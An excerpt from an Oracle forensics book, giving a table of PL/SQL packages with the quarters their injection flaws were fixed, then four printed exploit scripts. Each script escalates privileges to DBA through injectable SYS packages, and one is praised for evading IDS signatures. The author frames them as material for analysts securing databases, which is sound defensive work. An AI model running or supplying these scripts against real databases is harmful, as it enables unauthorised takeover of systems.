 |
|
PLSQL Injection and Finding
Examples
Oracle Forensics tips by Paul Wright
|
|
schema |
package |
Apr05 |
July05 |
Oct05 |
Jan06 |
Apr06 |
Jul06 |
|
CTXSYS |
CATSEARCH |
|
|
|
fixed |
|
|
|
CTXSYS |
CTX_DOC |
|
|
fixed |
|
|
|
|
CTXSYS |
CTX_QUERY |
|
|
fixed |
|
|
|
|
CTXSYS |
DRIDDLR |
fixed |
|
|
|
|
|
|
CTXSYS |
DRILOAD |
|
|
fixed |
|
|
|
|
CTXSYS |
DRI_MOVE_CTXSYS |
|
|
|
|
|
|
|
CTXSYS |
DRVDML |
|
|
|
fixed |
|
|
|
CTXSYS |
DRVXMD |
|
|
fixed |
|
|
|
|
DMSYS |
DMP_SYS |
|
|
|
|
|
|
|
EXFSYS |
DBMS_EXPFIL |
|
|
|
|
|
|
|
MDSYS |
MD2 |
|
|
fixed |
|
|
|
|
MDSYS |
PRVT_IDX |
|
|
fixed |
|
|
|
|
MDSYS |
PRVT_SAM |
|
|
fixed |
|
|
|
|
MDSYS |
RTREE_IDX |
fixed |
|
|
|
|
|
|
MDSYS |
SDO_CATALOG |
|
|
|
|
fixed |
|
|
MDSYS |
SDO_GEOR_INT |
|
|
|
|
fixed |
|
|
MDSYS |
SDO_GEOR_UTL |
|
|
fixed |
|
|
|
|
MDSYS |
SDO_GEOM |
|
|
fixed |
|
|
|
|
MDSYS |
SDO_GEOM_TRIG_INS1 |
|
|
|
|
|
|
|
MDSYS |
SDO_LRS_TRIG_INS |
|
|
|
|
fixed |
|
|
MDSYS |
SDO_PRIDX |
|
|
fixed |
|
|
|
|
MDSYS |
SDO_SAM |
|
|
fixed |
|
|
|
|
MDSYS |
SDO_TUNE |
|
|
fixed |
|
|
|
|
MDSYS |
SDO_UTIL |
|
|
fixed |
|
|
|
|
OLAPSYS |
CWM2_OLAP_AWAWUTIL |
|
|
fixed |
|
|
|
|
ORDSYS |
ORDIMAGE |
fixed |
|
|
|
|
|
|
ORDSYS |
ORDIMGIDXMETHODS |
|
|
|
|
|
fixed |
|
SYS |
AQ_INV |
|
|
|
|
fixed |
|
|
SYS |
DBMS_APPLY_PROCESS |
|
|
|
fixed |
|
|
|
SYS |
DBMS_APPLY_ADM_INTERNAL |
|
|
|
fixed |
|
|
|
SYS |
DBMS_AQADM_SYS |
|
|
|
fixed |
|
|
|
SYS |
DBMS_CDC_DPUTIL |
|
|
|
|
|
|
|
SYS |
DBMS_CDC_IMPDP |
|
|
|
|
|
|
|
SYS |
DBMS_CDCISUBSCRIBE |
|
|
fixed |
|
|
|
|
SYS |
DBMS_CDC_SUBSCRIBE |
|
|
fixed |
|
|
|
|
SYS |
DBMS_CDC_UTILITY |
|
|
|
fixed |
|
|
|
SYS |
DBMS_DATAPUMP |
|
|
|
fixed |
|
|
|
SYS |
DBMS_DDL |
|
|
|
|
|
fixed |
|
SYS |
DBMS_DEFER_REPCAT |
fixed |
|
|
|
|
|
|
SYS |
DBMS_EXPORT_EXTENSION |
|
|
|
|
fixed |
|
|
SYS |
DBMS_FGA |
|
|
|
fixed |
|
|
|
SYS |
DBMSINTERNALREPCAT |
fixed |
|
|
|
|
|
|
SYS |
DBMS_METADATA |
|
|
|
fixed |
|
|
|
SYS |
DBMS_LOGMNRSESSION |
|
|
|
|
fixed |
|
|
SYS |
DBMS_REPCAT |
fixed |
|
|
|
|
|
|
SYS |
DBMS_REPCAT_ADMIN |
|
|
|
|
|
fixed |
|
SYS |
DBMS_REPUTIL |
|
|
|
|
fixed |
|
|
SYS |
DBMS_SNAPSHOT_UTL |
|
|
|
|
fixed |
|
|
SYS |
DBMS_STATS |
|
|
|
|
|
fixed |
|
SYS |
DBMS_SYSTEM |
fixed |
|
|
|
|
|
|
SYS |
DBMS_XRWMV |
|
|
|
|
|
fixed |
|
SYS |
DBMS_DBUPGRADE |
|
|
|
|
|
fixed |
|
SYS |
KUPF$FILE |
|
|
fixed |
|
|
|
|
SYS |
KUPM$MCP |
|
|
|
|
|
|
|
SYS |
KUPW$WORKER |
|
|
|
|
|
fixed |
|
SYS |
LT |
|
|
|
|
|
|
|
SYS |
LTUTIL |
fixed |
|
|
|
|
|
|
SYS |
OUTLN_PKG |
|
|
|
fixed |
|
|
|
SYS |
OWA_OPT_LOCK |
|
|
|
|
|
|
|
WKSYS |
WK_ACL |
|
|
|
|
|
|
|
WKSYS |
WK_ADM |
|
|
|
|
|
|
|
XDB |
DBMS_XDB |
|
|
|
|
|
|
|
XDB |
DBMS_XDBZ0 |
|
|
|
|
|
|
|
XDB |
DBMS_XMLSCHEMA |
|
|
|
fixed |
|
|
|
XDB |
DBMS_XMLSCHEMA_INT |
|
|
|
fixed |
|
|
Examples of Other PLSQL Injection Exploits
http://milw0rm.com/exploits/3177
--Joxean Koret
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE.sql
DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
SELECT user_id INTO v_user_id
FROM user_users;
v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';
SEQUENCE_OWNER := 'TEST';
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/
This is an effectively
coded exploit as it avoids the “Grant DBA” syntax which would be
picked up by a typical IDS signature by inserting the necessary
values directly into the base table.
SYS.KUPW$WORKER.MAIN found by NGS and RDS
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker.html
<
SYS.KUPW$WORKER.MAIN.sql exploit
--Create a
function first and inject this function. The function will be
executed as user SYS.
CREATE OR REPLACE FUNCTION F return number
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 1;
END;
/
-- Inject
the function in the vulnerable procedure
exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');
SYS.DBMS_METADATA.GET_DDL
<
SYS.DBMS_METADATA.GET_DDL.sql PLSQL Exploit
--For 9iR2:
CREATE OR REPLACE FUNCTION ATTACKER_FUNC return varchar2 authid
current_user as pragma autonomous_transaction;
BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END; /
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','')
FROM dual; /
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION
Esteban Martinez Fayo
of Argeniss
<
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION.sql Exploit
CREATE OR REPLACE FUNCTION
ATTACKER_FUNC return varchar2 authid current_user as pragma
autonomous_transaction;
BEGIN EXECUTE IMMEDIATE 'GRANT DBA
TO SCOTT';
COMMIT;
RETURN '';
END;
/
SELECT
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''','')
FROM dual;
/
The purpose of this
book is not to publish exploits it is to aid the analyst to
ascertain vulnerability to a forensic level of accuracy. However it
is crucial to know what an exploit looks like if we are to secure
our databases effectively.
This is an excerpt from the book "Oracle
Forensics: Oracle Security Best Practices", by Paul M. Wright,
the father of Oracle Forensics.
